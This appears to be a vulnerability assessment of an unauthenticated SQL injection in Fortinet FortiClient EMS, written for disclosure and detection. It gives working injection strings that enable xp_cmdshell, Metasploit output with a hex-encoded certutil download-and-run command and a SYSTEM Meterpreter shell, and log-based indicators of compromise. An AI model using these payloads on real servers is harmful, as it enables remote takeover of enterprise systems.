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A improper neutralization of special elements used in an sql command (‘sql injection’) in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.
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Attacker ValueVery High
ExploitabilityVery High
Technical Analysis
An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server). FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized platform for overseeing enrolled endpoints. The SQLi vulnerability is due to user controller strings which can be sent directly into database queries.
Affected versions of FortiClient EMS include:
7.2.0 through 7.2.2
7.0.1 through 7.0.10
FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013 and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database. In the message header of a specific request sent between the two services, the FCTUID
parameter is vulnerable to SQLi. The SQLi can be used to enable the xp_cmdshell
which can then be used to obtain unauthenticated remote code execution in the context of NT AUTHORITY\SYSTEM
It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient EMS for the necessary vulnerable services to be available. So technically the server, out of the box, is not vulnerable in its default configuration which usually diminishes an exploit’s attacker value. However, it’s quite unlikely that an Endpoint Management Server running in production would not be managing any endpoints so I personally think it still deserves a 5/5 for an Attacker Value and given the simplicity and unauthenticated nature of the exploit, 5/5 for Exploitability as well.
Testing SQLi
One can test the vulnerability by establishing a TCP socket with SSL enabled on port 8013 of an endpoint running FortiClient EMS. If you then send the following data on across the established connection, which injects the following SQL: ' OR 1=1; –
into the vulnerable FCTID
A vulnerable endpoint will return a response containing the string KA_INTERVAL
like so:
FCKARPLY: CONT|1|EMSSN|FCTEMS0000125975:dc2.kerberos.issue|UPLD_PRT|8013|KA_INTERVAL|60|LIC_FEATS|283004|LIC_ED|1870228800|AUTH_PRD|0|SNAPTIME|0|QUAR|0|AVTR|1|AV_SIG|92.03303|SERIAL|6C68D8277A537F95521BB0C8310727DF46D3C97B|EMS_ONNET|0|ZHVR|eJzVmG1zojAQgL/fr8j5XYEAam8oHY/SlzmtnbbXzk3tMCkGTI3ghPjSf39RQLSlFG+sN35Rkt3N7j5JFhLjZD6iYIpZRMLguKLU5ArAgRv2SeAfVybcqzYrJ+Y3wwsZJy4lOOCOGwYe8ScMcWFjGomx2ajJtYYhpU1jjIQJom/UFUPKFxiDMOKOsCYecZOuEZo7HPmOR5G/sNxoL6VsQnHc1BN51mMsHqP4L/7NNNe0AjQS4u+P1mnrrvXYuQXXLJy/3g4wpeB+QgPM0DPFT0+mIcWqYWTOSNAPZ5EhiWfDZYSLsJFpeBjxCcOmO8XONDEllHCChWoqTPUXCQoEXCDN3Fv3dhXKUKmqCpQbS6crnQD7gssUm7KIJH0W8mw4KQuFL1JbsNoivUw9gy7H3TEqaTmqlAFdx6o1DgGrpkP1oLCq9YPAqjUODKtegPXGnhLqXHYtB8+3Y+kRisvC+9EbzkI2FJW2h3whqqXOdsrwfS454I7Kc9NKcXMZ3x+31NkXcUuHz+HWLM9NLcWNYZ9EnL06Q/y6FcDUsCTEi1/2H6fdtVptp9OyLi6v7N5t9+zuoXVj9x66D3VNhVdhH/d+UuQO2wJf1EFcjNb7StDvks8hXn6HF23w+84MMQymlsgCM3AmVh/4PaYh6oMqWFU1CGVZ33cpzZzulPK2GedV13r5b4Hid5Y9dwco8DG4sewN9/Wmvn/gK6e7fnd9nmYeZb18TSmg3OIURRFBAeieX7U3I4AiAkXV9gt63elOQZfNNI+1Vpo1LGB9TngbPQPLlmwbWOFohII+uAxesLs4xmzuL/g/Kgr8ioryL1nnzYFaeg6Kzm3XExph4V4cVEfL0yM4JZFLw0hwWsWiHFUVRVfkvc7AhtOdzsD2Oefxh6X5y0X1ZozcAQbt0Nde1ude0yBs7nvFZ053W2k+zTGPr/IhXym5oBB90ZrTdK1nVu9DQZQmn0uY4b4T38xEb2JInMXDSzn3K9LH1zp/AQpaQ/A=|HVCS|913c523b8b79d4714cbdb64e7cc6268c|TAGS|000000000000000000000000000000000000000000000000000|
Getting RCE
The SQLi injection can be used to obtain unauthenticated RCE on the vulnerable FortiClient EMS endpoint by enabling the xp_cmdshell
. As demonstrated in the metasploit module, the following five SQL injections can be used to enable xp_cmdshell
and then use it to execute a payload:
"' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;--", "' OR 1=1; reconfigure;--", "' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;--", "' OR 1=1; reconfigure;--", "' OR 1=1; DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec master.dbo.xp_cmdshell @sql;--",
When attempting to obtain RCE it was noticed that the application takes the command that you inject and transforms it to all uppercase characters (this can be seen in the logs included in the IOC section below). This breaks any attempt to Base64 encode a payload and then run it using master.dbo.xp_cmdshell powershell.exe -e <Base64 encoded payload>
(as Base64 is case sensitive). Which is why the metasploit module encodes the payload in hex and then uses MSSQL to decode the payload before running it with xp_cmdshell
Metasploit Module Demo
msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts rhosts => msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set lhost lhost => msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > options Module options (exploit/windows/http/forticlient_ems_fctid_sqli): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see RPORT 8013 yes The target port (TCP) VHOST no HTTP server virtual host Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) FETCH_DELETE false yes Attempt to delete the binary after execution FETCH_FILENAME FqgyHVSnYd no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. LHOST yes The listen address (an interface may be specified) LPORT 8383 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target View the full module info with the info, or info -d command. msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > run [*] Reloading module... [*] Started reverse TCP handler on [*] - Running automatic check ("set AutoCheck false" to disable) [+] - The target is vulnerable. The SQLi has been exploited successfully [+] - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;-- was executed successfully [+] - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully [+] - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;-- was executed successfully [+] - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully [*] Sending stage (201798 bytes) to [+] - The SQLi: ' OR 1=1; DECLARE @SQL VARCHAR(120) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75 726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f7a524b42764743776d624662474c46336c4e6f486d772025 54454d50255c6a744d45695362632e6578652026207374617274202f42202554454d50255c6a744d45695362632e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully [*] Meterpreter session 8 opened ( -> at 2024-04-11 14:00:22 -0700 meterpreter > getuid syServer username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : DC2 OS : Windows Server 2019 (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : KERBEROS Logged On Users : 16 Meterpreter : x64/windows meterpreter >
There are a number of files in C:\Program Files (x86)\Fortinet\FortiClientEMS\logs\
that will contain evidence of exploitation on a compromised host. The following excerpts were taking from fcmdaemon[2024-04-10 15-29-42].log
and you can see the vulnerability being exploited as the FTCUID
parameter CBE8FC122B1A46D18C3541E1A8EFF7BD'
is being injected with SQL commands which enable the xp_cmdshell
which is then used to launch calc.exe
"CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1; EXEC MASTER.DBO.SP_CONFIGURE 'SHOW ADVANCED OPTIONS', 1;--", "vdom":"FCM_default", "jsonData": "{}", "ops": [], "flag":0} [04-11 11:10:29][ ERROR]: DAS returned an error - Error = Internal error, Command was = {"operation": "UPDATE", "model": "FORTI_CLIENT", "id": "CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1; EXEC MASTER.DBO.SP_CONFIGURE 'SHOW ADVANCED OPTIONS', 1;--", "vdom":"FCM_default", "jsonData": "{\"uid\":\"\",\"last_seen\":1712848228,\"online\":1}", "ops": [], "flag":0} [04-11 11:10:29][ ERROR]: DAS returned an error - Error = mssql: Incorrect syntax near the keyword 'AND'., Command was = {"operation": "GET_BY_UID", "model": "FCT_USERS", "id": "CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1; RECONFIGURE;--", "vdom":"FCM_default", "jsonData": "{}", "ops": [], "flag":0} [04-11 11:10:29][ ERROR]: DAS returned an error - Error = Internal error, Command was = {"operation": "UPDATE", "model": "FORTI_CLIENT", "id": "CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1; RECONFIGURE;--", "vdom":"FCM_default", "jsonData": "{\"uid\":\"\",\"last_seen\":1712848229,\"online\":1}", "ops": [], "flag":0} [04-11 11:10:29][ ERROR]: DAS returned an error - Error = mssql: Incorrect syntax near the keyword 'AND'., Command was = {"operation": "GET_BY_UID", "model": "FCT_USERS", "id": "CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1; EXEC MASTER.DBO.SP_CONFIGURE 'XP_CMDSHELL',1;--", "vdom":"FCM_default", "jsonData": "{}", "ops": [], "flag":0} [04-11 11:10:29][ ERROR]: DAS returned an error - Error = Internal error, Command was = {"operation": "UPDATE", "model": "FORTI_CLIENT", "id": "CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1; EXEC MASTER.DBO.SP_CONFIGURE 'XP_CMDSHELL',1;--", "vdom":"FCM_default", "jsonData": "{\"uid\":\"\",\"last_seen\":1712848229,\"online\":1}", "ops": [], "flag":0} [04-11 11:10:29][ ERROR]: DAS returned an error - Error = mssql: Incorrect syntax near the keyword 'AND'., Command was = {"operation": "GET_BY_UID", "model": "FCT_USERS", "id": "CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1; RECONFIGURE;--", "vdom":"FCM_default", "jsonData": "{}", "ops": [], "flag":0} [04-11 11:10:29][ ERROR]: DAS returned an error - Error = Internal error, Command was = {"operation": "UPDATE", "model": "FORTI_CLIENT", "id": "CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1; RECONFIGURE;--", "vdom":"FCM_default", "jsonData": "{\"uid\":\"\",\"last_seen\":1712848229,\"online\":1}", "ops": [], "flag":0} [04-11 11:10:29][ ERROR]: DAS returned an error - Error = mssql: Incorrect syntax near the keyword 'AND'., Command was = {"operation": "GET_BY_UID", "model": "FCT_USERS", "id": "CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1; EXEC MASTER.DBO.XP_CMDSHELL 'CMD.EXE /C CALC.EXE';--", "vdom":"FCM_default", "jsonData": "{}", "ops": [], "flag":0} [04-11 11:10:30][ ERROR]: DAS returned an error - Error = Internal error, Command was = {"operation": "UPDATE", "model": "FORTI_CLIENT", "id": "CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1; EXEC MASTER.DBO.XP_CMDSHELL 'CMD.EXE /C CALC.EXE ';--", "vdom":"FCM_default", "jsonData": "{\"uid\":\"\",\"last_seen\":1712848229,\"online\":1}", "ops": [], "flag":0}
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Hi, the proble is i can’t found the exploit item “windows/http/forticlient_ems_fctid_sqli”, where is it ?
Hey yyt0524, my apologies, the pull request for the module is still in review on github but can be found here:
I got it, thanks